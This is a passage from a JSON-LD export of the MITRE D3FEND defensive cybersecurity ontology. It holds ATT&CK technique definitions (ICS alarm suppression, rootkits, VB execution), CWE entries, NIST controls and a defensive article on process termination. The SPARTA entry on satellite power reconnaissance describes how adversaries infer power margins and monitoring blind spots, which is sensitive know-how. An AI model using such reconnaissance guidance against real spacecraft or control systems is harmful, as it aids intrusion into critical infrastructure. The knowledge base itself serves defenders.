      "@id": "d3f:T1059.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.005",
      "d3f:definition": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)",
      "rdfs:label": "Visual Basic",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:OSAPIConnectSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that establishes a connection between a socket and a endpooint.",
      "d3f:invokes": {
        "@id": "d3f:ConnectSocket"
      },
      "rdfs:label": "OS API Connect Socket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N0d04ea58db394423964558dbb203363a"
        }
      ]
    },
    {
      "@id": "_:N0d04ea58db394423964558dbb203363a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConnectSocket"
      }
    },
    {
      "@id": "d3f:T0878",
      "@type": "owl:Class",
      "d3f:attack-id": "T0878",
      "d3f:definition": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.",
      "rdfs:label": "Alarm Suppression - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Alarm Suppression"
    },
    {
      "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/news-events/analysis-reports/ar21-134a"
      },
      "d3f:kb-organization": "CISA",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "d3f:DNSCacheEviction"
        }
      ],
      "d3f:kb-reference-title": "Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise",
      "rdfs:label": "Reference - Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise - CISA"
    },
    {
      "@id": "d3f:Reference-CAR-2015-04-001%3ARemotelyScheduledTasksViaAT_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-04-001/"
      },
      "d3f:kb-abstract": "When AT.exe is used to remotely schedule tasks, Windows uses named pipes over SMB to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe “ATSVC” is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention C:\\Windows\\System32\\AT<job\\_id>. Unlike CAR-2013-05-004, this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained execution.\n\nThis pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern C:\\Windows\\System32\\AT\\<job_id\\>.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-04-001: Remotely Scheduled Tasks via AT",
      "rdfs:label": "Reference - CAR-2015-04-001: Remotely Scheduled Tasks via AT - MITRE"
    },
    {
      "@id": "d3f:T0851",
      "@type": "owl:Class",
      "d3f:attack-id": "T0851",
      "d3f:definition": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Rootkit - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        }
      ],
      "skos:prefLabel": "Rootkit"
    },
    {
      "@id": "d3f:ConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ConfigurationDatabaseRecord"
      },
      "rdfs:label": "Configuration Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationResource"
        },
        {
          "@id": "_:Ndfb440c783ba42c18b00e6d671b5114c"
        }
      ]
    },
    {
      "@id": "_:Ndfb440c783ba42c18b00e6d671b5114c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:ImageSynthesisGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ISG",
      "d3f:definition": "Image synthesis thorugh the application of Generative Adversarial Networks.",
      "d3f:kb-article": "## References\n\nZhang, Q., Wang, H., Lu, H., Won, D., & Yoon, S. W. (2018). Medical Image Synthesis with Generative Adversarial Networks for Tissue Recognition. 2018 IEEE International Conference on Healthcare Informatics (ICHI), 199-207. doi: 10.1109/ICHI.2018.00030. [Link](https://ieeexplore.ieee.org/document/8419363)",
      "rdfs:label": "Image Synthesis GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:T1647",
      "@type": "owl:Class",
      "d3f:attack-id": "T1647",
      "d3f:definition": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)",
      "rdfs:label": "Plist File Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:InferentialStatistics",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IS",
      "d3f:definition": "Statistical inference is the process of using data analysis to infer properties of an underlying distribution of probability.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical inference. [Link](https://en.wikipedia.org/wiki/Statistical_inference)",
      "rdfs:label": "Inferential Statistics",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:CWE-207",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-207",
      "d3f:definition": "The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker.",
      "rdfs:label": "Observable Behavioral Discrepancy With Equivalent Products",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-205"
      }
    },
    {
      "@id": "d3f:summarizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x summarizes y: The sensor x summarizes a set y of events concerning digital artifacts over time.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02758570-v"
      },
      "rdfs:label": "summarizes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:VPNServer",
      "@type": "owl:Class",
      "d3f:definition": "A VPN server is a type of server that enables hosting and delivery of VPN services.\n\nIt is a combination of VPN hardware and software technologies that provides VPN clients with connectivity to a secure and/or private network, or rather, the VPN.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/30750/vpn-server"
      },
      "rdfs:label": "VPN Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Virtual_private_network"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:ProcessTermination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessTermination"
      ],
      "d3f:d3fend-id": "D3-PT",
      "d3f:definition": "Terminating a running application process on a computer system.",
      "d3f:kb-article": "## How it works\n\nProcesses are managed by the operating system kernel.  Different operating system kernels manage the creation and termination of processes in a different manner, and expose this functionality via the kernel API.\n\nA running process might be terminated to mitigate its immediate effects if it is exhibiting anomalous, unauthorized, or malicious behavior; such as after detecting anomalous behavior via <a href=\"https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#AdministrativeNetworkActivityAnalysis\">Administrative Network Activity Analysis</a>, after a failed check from <a href=\"https://d3fend.mitre.org/technique/d3f:StackFrameCanaryVerification\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#StackFrameCanaryValidation\">Stack Frame Canary Validation</a>, or after <a href=\"https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#SystemCallAnalysis\">System Call Analysis</a> finds an attempt to execute an unauthorized system call.\n\n### Proprietary technology\nSecurity software might use proprietary technology to terminate processes, instead of the system-provided functions.    Further research may provide specific detail on such methods used.\n\n### System-provided functions\n\n#### Windows tools\nIn Windows, `ExitProcess()` is used to send a signal to a process to request it to exit, and `TerminateProcess()` is used to force a process to exit.\n\nThe `taskkill` executable available in the cmd shell is used to kill a process, with the `/F` switch forcing termination as with `TerminateProcess()`.  In PowerShell, `Stop-Process` is used, which is aliased by default to `spps` and `kill`.  
Processes started in the Windows Subsystem for Linux (WSL) environment may be terminated there with the `kill` command.\n\nIn some cases, existing drivers can also be leveraged to kill processes.\n\n#### Unix/Linux tools\nIn Unix-like systems, all process termination requests are handled using signals.  The `kill` function takes the Process ID and signal to send, and is accessible with the `kill` command.  Some shells have a `kill` builtin function which is separate than the `kill` binary, which can also kill background jobs in the shell and additionally perform the function faster, and can run from an existing instance of the shell if the process table is full.  The signal SIGTERM specifies that the process to terminate may invoke a handler that it has defined instead of terminating, and the signal SIGKILL forces immediate termination.\n\nThe related command `xkill` terminates the connection of a program to the X window server, after which the user process may decide to terminate itself; however, termination is not guaranteed as the process, which could be on the same or different host, could then run in a terminal or reconnect to a different X server on any host.  Emacs is such a program that would not terminate itself after its connection to the X server is terminated.\n\n## Considerations\n\n### Persistence Mechanisms\nTerminating a malicious process is not enough to stop an adversary that has already gained persistence in the host via any initial access mechanism, including through that process or another access mechanism.\n\n### Terminating Multiple Processes\nOn most operating systems, process termination operations typically occur independently of each other, without functionality provided to atomically terminate multiple processes.  
If there are multiple malicious processes which can make system calls to spawn other processes once one of them is closed, user session termination or system restart might be required.\n\n### Process Access Permissions\nUsers must have permissions to kill the process.  On Unix-like systems, either root or the process user can kill the process.  On Windows systems, process permissions are managed separately via process security tokens.\n\n### Process Resource Handles\n\n#### Terminating Processes with Open Resource Handles\n\nProcesses may have open resource handles, which could leave those resources in an undesired state if the process is forced to terminate.  As such, most operating systems provide a means to send a signal to a process to inform it to gracefully terminate, and on most of these operating systems, it is the typical first step used to terminate a process.\n\n#### Signal Traps\nAs the process may have open resource handles, commonly-used methods of process termination involve sending a signal to the process to terminate.\nOn Windows, the `ExitProcess()` function is used for this purpose.  Process instructions, as well as a third-party DLL can also cause the process to exit.\nOn Linux, the process is sent a signal on the occurrence of various events: when it loses the console, `SIGHUP`; when termination is requested, `SIGTERM`.  The processor then redirects execution to the function registered to handle the signal.\n\nTherefore, sending a signal to the process to ask it to terminate may not always work.\n\n##### Avoiding Signal Traps\n\nOn Unix-like systems, sending the `SIGKILL` signal for a process does not send a message to the process or invoke an implementation-defined handler; instead, it immediately does not allow the process to execute any further processor instructions.   
On Windows `TerminateProcess()` instead of `ExitProcess()` performs the equivalent.\n\n#### Hang on System Call Execution\n\nEven still, as the operating system kernel manages the processes, kernel code may block process signals, including those which cannot be trapped, and does in certain circumstances.  Signals are blocked and queued for the duration of the system call when interrupting the system call would result in a kernel invariant being violated, such as when an action results in a malformed data structure; this blocking is common for filesystem requests.  Such system calls can hang when a filesystem has gone offline, leading to a long-term uninterruptible sleep, represented in POSIX command `ps` output as D state.\nAny malicious system calls or system call handlers are issues of a much larger problem (a kernel-level rootkit) and the system should be redeployed entirely or restored from a backup known to be prior to compromise, and other systems accessible directly and indirectly from that one should also be examined.\n\nA process that is truly hung in a system call may prevent the system from shutting down and leave it in an unresponsive state; a hard power off is required.\n\nTo speed up the action of terminating a process in uninterruptible sleep, the process resource accesses (handles) could be analyzed.\n\nOn Linux, [`sync` followed by `echo 3 > /proc/sys/vm/drop_caches`](https://www.kernel.org/doc/Documentation/sysctl/vm.txt) is a safe way to free up some inactive resource handles.\n\n\n#### Kernel Processes and Threads\nThe kernel may not allow kernel processes, which are created via methods other than user-space processes, to be terminated.\n\n#### Other Code using the Process\n\nTerminating a shared library can lead to unexpected errors; such shared libraries have their own mechanisms for termination.\n\nOn Windows, a DLL is unloaded when the reference count of the library reaches 0.\n\n#### Zombie process\n\nAfter a process has been terminated, it 
may still take up an entry in the operating system process table until another event occurs.\n\n##### Windows\nIn Windows, a process object is deleted when the last handle to the process is closed.\n\n##### Linux\nIn Linux, a process is removed from the process table when it is reaped by its parent process.  If the parent terminates, historically the parent has been changed to pid 1; however, in the Linux kernel 3.4 and above, processes can set a different process as the subreaper using the `prctl()` system call.\n\nZombie processes and hung processes could be resolved with a restart of the system.\n\n#### System restart\nFinally a system restart might be required to kill a process.\nSystems which are only accessible via a remote in-band connection may become inaccessible if a process termination operation that is necessary for reboot does not complete.\n\n### Subsystems\nProcesses that are started in a subsystem might not be fully terminated if they are terminated using the command for that subsystem.  For example, in the Windows Subsystem for Linux (WSL), processes started and terminated via WSL calls such as with the `kill` command in Bash may still have an entry in the Windows process table.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-InstantProcessTerminationToolToRecoverControlOfAnInformationHandlingSystem_DellProductsLP"
        },
        {
          "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc"
        }
      ],
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Process Termination",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N4a88f0bbb2e141689d18eb29ea6de914"
        }
      ]
    },
    {
      "@id": "_:N4a88f0bbb2e141689d18eb29ea6de914",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Privileged User Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-2(7)"
    },
    {
      "@id": "d3f:Reference-FederalPublicKeyInfrastructure101",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.idmanagement.gov/university/fpki/"
      },
      "d3f:kb-author": "Identity, Credential, and Access Management Subcommittee (ICAMSC)",
      "d3f:kb-reference-of": {
        "@id": "d3f:Certificate-basedAuthentication"
      },
      "d3f:kb-reference-title": "Federal Public Key Infrastructure 101",
      "rdfs:label": "Reference - Federal Public Key Infrastructure 101"
    },
    {
      "@id": "d3f:Reference-MissionDependencyModelingForCyberSituationalAwareness",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csis.gmu.edu/noel/pubs/2016_NATO_IST_148.pdf"
      },
      "d3f:kb-abstract": "This paper describes a hierarchical graph-based model that captures mission dependencies at various levels of abstraction, showing interdependencies among mission objectives, tasks, information, and cyber assets. For this work, we employ established tools within a structured methodology for cyber resiliency analysis. Our model is focused on a strategic-level military scenario defined in a formal Request for Information (RFI) to industry and research partners by the NATO Multinational Cyber Defense Capability Development (MN CD2) Work Package 2 (WP2). We enhance this scenario with additional mission and operational context, and then build a mission dependency model for the enhanced scenario. It is anticipated that our mission dependency model will be part of an upcoming demonstration of cyber defense situational awareness capabilities in a NATO Communications and Information (NCI) Agency test environment, integrated with data sources that represent the operational military environment.",
      "d3f:kb-author": "William Heinbockel, Steven Noel, James Curbo",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Mission Dependency Modeling for Cyber Situational Awareness",
      "rdfs:label": "Reference - Mission Dependency Modeling for Cyber Situational Awareness"
    },
    {
      "@id": "d3f:CCI-002358_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is always invoked.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002358"
    },
    {
      "@id": "d3f:Reference-FWTKDocumentation-Fwtk.org",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20070510153306/http://www.fwtk.org/fwtk/docs/documentation.html#1.1"
      },
      "d3f:kb-abstract": "In case you don't already know, FWTK stands for the FireW all Tool Kit. It is used as a base to create a secure firewall system. If you need good documentation, please read the source code. If you are not familiar with C or do not feel comfortable with performing the configuration and security verification yourself, then I would suggest that you purchase a commercial firewall from a vendor (such as TIS, Checkpoint, Raptor, etc.).\n\nA machine needs other tools to secure it, including, but hardly limited to, tools to check files (tripwire), audit tools (tiger/cops), secure access methods (kerberos/ssh), something to watch logs and machine states (swatch/watcher some to mind) and filtering and routing tools such as screend/ipfilterd/ipacl.\n\nAgain, I would recommend that you do not proceed to build a production FWTK firewall unless you are familiar with UNIX security.",
      "d3f:kb-author": "fwtk.org",
      "d3f:kb-organization": "fwtk.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "FWTK Documentation",
      "rdfs:label": "Reference - FWTK Documentation - fwtk.org"
    },
    {
      "@id": "d3f:HardwareWatchdogTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A hardware watchdog timer is a watchdog timer implemented using electronic components.",
      "rdfs:label": "Hardware Watchdog Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareTimer"
        },
        {
          "@id": "d3f:WatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4"
    },
    {
      "@id": "d3f:CWE-1037",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1037",
      "d3f:definition": "The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified.",
      "rdfs:label": "Processor Optimization Removal or Modification of Security-critical Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1038"
      }
    },
    {
      "@id": "d3f:OSAPIGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves the execution context or state of a specific thread in a process.",
      "d3f:invokes": {
        "@id": "d3f:GetThreadContext"
      },
      "rdfs:label": "OS API Get Thread Context",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N158f2751912b483c862aa36195726619"
        }
      ]
    },
    {
      "@id": "_:N158f2751912b483c862aa36195726619",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetThreadContext"
      }
    },
    {
      "@id": "d3f:OTStopCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to stop a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Stop Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N7bb5b6aa5d414d6e81c0db5b7eae327a"
        }
      ]
    },
    {
      "@id": "_:N7bb5b6aa5d414d6e81c0db5b7eae327a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:LocalUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account on a given host is a local user account for that specific host.",
      "rdfs:label": "Local User Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:JobFunctionAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:JobFunctionAccessPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authorization"
      },
      "d3f:d3fend-id": "D3-JFAPA",
      "d3f:definition": "Detecting anomalies in user access patterns by comparing user access activity to behavioral profiles that categorize users by role such as job title, function, department.",
      "d3f:kb-article": "## How it works\nPeer group analysis identifies functionally similar groups of actors (users or resources) based on categorizations such as job title, organizational hierarchy, or other attribute that indicates similarity of job function. Current user access activity is then compared to the appropriate peer group behavior profile to identify anomalies.\n\n## Considerations\nPotential for false positives from anomalies that are not associated with malicious activity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AnomalyDetectionUsingAdaptiveBehavioralProfiles_SecuronixInc"
      },
      "rdfs:label": "Job Function Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N06fb7aec82fd4b6b9d9e0801fb661e63"
        }
      ]
    },
    {
      "@id": "_:N06fb7aec82fd4b6b9d9e0801fb661e63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:WindowsRegistryValueSetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where data is assigned to a registry value, either creating it or updating its existing content.",
      "rdfs:label": "Windows Registry Value Set Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryValueEvent"
      }
    },
    {
      "@id": "d3f:date",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "A point or period of time associated with an event in the lifecycle of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.w3.org/wiki/Good_Ontologies#The_Dublin_Core_.28DC.29_ontology"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:REC-0001.08",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.08",
      "d3f:definition": "Reconnaissance of the electrical power system (EPS) focuses on generation, storage, distribution, and autonomy. Useful details include solar array topology and SADA behavior, MPPT algorithms, array string voltages, eclipse depth assumptions, battery chemistry and configuration, BMS charge/discharge limits and thermal dependencies, PCDU architecture, load-shed priorities, latching current limiters, and survival power rules. Artifacts surface in EPS ICDs, acceptance test data, TVAC power margin reports, anomaly response procedures, and vendor manuals. Correlating these with attitude plans and payload schedules lets a threat actor infer when state-of-charge runs tight, which loads are shed first, and how fast recovery proceeds after a brownout or safing entry. Knowledge of housekeeping telemetry formats and rate caps helps identify blind spots where abusive load patterns or command sequences may evade detection.",
      "rdfs:label": "Power - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/08/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Power"
    },
    {
      "@id": "d3f:SessionCookie",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A session cookie, also known as an in-memory cookie, transient cookie or non-persistent cookie, exists only in temporary memory while the user navigates the website. Web browsers normally delete session cookies when the user closes the browser. Unlike other cookies, session cookies do not have an expiration date assigned to them, which is how the browser knows to treat them as session cookies.",
      "rdfs:isDefinedBy": {
        "@id": "https://schema.ocsf.io/objects/http_cookie"
      },
      "rdfs:label": "Session Cookie",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:HTTP_cookie"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_cookie"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": [
        "In-memory Cookie",
        "Non-persistent Cookie",
        "Transient Cookie",
        "Web Session Cookie"
      ]
    },
    {
      "@id": "d3f:CWE-455",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-455",
      "d3f:definition": "The product does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error or a hardware security module (HSM) cannot be activated, which can cause the product to execute in a less secure fashion than intended by the administrator.",
      "rdfs:label": "Non-exit on Failed Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-636"
        },
        {
          "@id": "d3f:CWE-665"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:T1595",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595",
      "d3f:definition": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.",
      "rdfs:label": "Active Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001085_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system utilizes underlying hardware separation mechanisms to implement security function isolation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001085"
    },
    {
      "@id": "d3f:Reference-EmbeddingContextsForOn-lineThreatsIntoResponsePolicyZones-VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10440059B1"
      },
      "d3f:kb-abstract": "Hierarchical threat intelligence embedded in subdomain CNAMEs of a DNS denylist.\n\nIn one embodiment, a response policy zone (RPZ) application generates an RPZ that includes contexts for the on-line threats that are associated with domain names. For a domain name that is associated with an on-line threat, the RPZ application determines a threat specification that describes a characteristic of the on-line threat. The RPZ application then generates an alias based on the domain name and the threat specification. Subsequently, the RPZ application generates a domain name system (DNS) resource record that maps the domain name to the alias, includes the resource record in the RPZ, and transmits the RPZ to a DNS name server that implements the RPZ. Upon receiving a DNS query associated with the domain name, the DNS name server generates a DNS response based on the alias. Because the domain name and the threat specification are reflected in the alias, the DNS response automatically provides a relevant context.",
      "d3f:kb-author": "Ben McCarty",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-reference-of": {
        "@id": "d3f:HierarchicalDomainDenylisting"
      },
      "d3f:kb-reference-title": "Embedding contexts for on-line threats into response policy zones",
      "rdfs:label": "Reference - Embedding contexts for on-line threats into response policy zones - Verisign Inc"
    },
    {
      "@id": "d3f:HardwareDeviceConnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the physical or logical attachment of a device to a system, enabling its operational functionality.",
      "rdfs:label": "Hardware Device Connection Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:CredentialRevocation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialRevocation"
      ],
